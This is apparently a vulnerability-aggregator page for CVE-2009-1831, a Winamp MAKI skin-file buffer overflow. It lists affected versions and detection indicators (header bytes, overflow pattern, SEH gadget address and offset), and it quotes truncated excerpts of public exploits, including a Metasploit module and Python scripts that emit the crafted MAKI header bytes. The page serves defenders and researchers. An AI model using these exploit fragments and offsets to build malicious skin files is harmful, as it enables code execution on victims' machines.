CVE-2009-1831
published 2009-05-29CVE-2009-1831: The Nullsoft Modern Skins Support module (gen_ff.dll) in Nullsoft Winamp before 5.552 allows remote attackers to execute arbitrary code via a crafted MAKI…
PriorityP258critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
36.34%
98.3th percentile
The Nullsoft Modern Skins Support module (gen_ff.dll) in Nullsoft Winamp before 5.552 allows remote attackers to execute arbitrary code via a crafted MAKI file, which triggers an incorrect sign extension, an integer overflow, and a stack-based buffer overflow.
Affected
74 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | <= 5.55 | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
46 47 03 04 17 00 00 00 2A 00 00 00 71 49 65 51 87 0D 51 4A 91 E3 A6 B5 32 35 F3 E7
- →Detect crafted MAKI files with the magic header bytes 46 47 03 04 placed in the Winamp Bento skin scripts directory as mcvcore.maki; this is the consistent delivery mechanism across all public exploits. ↗
- →The overflow trigger is a sequence of 0xFF bytes (11 bytes: FF FF FF FF FF FF FF FF FF FF FF) immediately following the MAKI header; monitor file writes containing this pattern in MAKI files. ↗
- →The exploit overwrites SEH (Structured Exception Handler) records on the stack; look for SEH chain corruption patterns (short JMP + NOP sled: EB 06 90 90) in stack memory during Winamp MAKI parsing. ↗
- →The Metasploit module targets winamp.exe 5.5.5.2405 with a return address of 0x12f02bc3 (pop/pop/ret gadget from in_mod.dll) at stack offset 16756; use this as a signature for exploit attempts against this specific version. ↗
- →The crafted MAKI file structure includes a type GUID 71 49 65 51 87 0D 51 4A 91 E3 A6 B5 32 35 F3 E7 in the header; this GUID is consistent across all exploit samples and can be used as a file-based detection signature. ↗
- ·The exploit requires the victim to manually place mcvcore.maki into the Bento skin scripts directory, or be convinced to install a malicious skin; it is not a drive-by or network-reachable vector without user interaction. ↗
- ·Winamp 5.552 and later are not vulnerable; the fix changed movsx (sign-extending) to movzx (zero-extending) for the string size field in gen_ff.dll, preventing the integer overflow. ↗
- ·The Metasploit module's hardcoded RET address (0x12f02bc3 from in_mod.dll) is specific to Winamp 5.5.5.2405 on Windows XP SP3 / Windows 7 SP1; other versions or patch levels will require different offsets. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Winamp - MAKI Buffer Overflow (Metasploit)
exploitdb·2012-09-12
CVE-2009-1831 Winamp - MAKI Buffer Overflow (Metasploit)
Winamp - MAKI Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Winamp MAKI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used with in a insecure way with user controlled data.
To exploit the vulnerability the attacker must convince the attacker to install the
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
or generate a new skin usi
Exploit-DB
Winamp 5.551 - MAKI Parsing Integer Overflow
exploitdb·2009-05-26
CVE-2009-1831 Winamp 5.551 - MAKI Parsing Integer Overflow
Winamp 5.551 - MAKI Parsing Integer Overflow
---
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3
And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i h
Exploit-DB
Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)
exploitdb·2009-05-22
CVE-2009-1831 Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)
Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)
---
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Teasted:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and
Exploit-DB
Winamp 5.55 - MAKI script Universal Integer Overflow
exploitdb·2009-05-22
CVE-2009-1831 Winamp 5.55 - MAKI script Universal Integer Overflow
Winamp 5.55 - MAKI script Universal Integer Overflow
---
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x3
Exploit-DB
Winamp 5.55 - MAKI Script Universal Overwrite (SEH)
exploitdb·2009-05-22
CVE-2009-1831 Winamp 5.55 - MAKI Script Universal Overwrite (SEH)
Winamp 5.55 - MAKI Script Universal Overwrite (SEH)
---
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00
Metasploit
Winamp MAKI Buffer Overflow
metasploit
Winamp MAKI Buffer Overflow
Winamp MAKI Buffer Overflow
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user controlled data. To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
No writeups or analysis indexed.
http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.htmlhttp://www.securityfocus.com/bid/35052https://exchange.xforce.ibmcloud.com/vulnerabilities/50664https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15683https://www.exploit-db.com/exploits/8767https://www.exploit-db.com/exploits/8770https://www.exploit-db.com/exploits/8772https://www.exploit-db.com/exploits/8783http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.htmlhttp://www.securityfocus.com/bid/35052https://exchange.xforce.ibmcloud.com/vulnerabilities/50664https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15683https://www.exploit-db.com/exploits/8767https://www.exploit-db.com/exploits/8770https://www.exploit-db.com/exploits/8772https://www.exploit-db.com/exploits/8783
2009-05-29
Published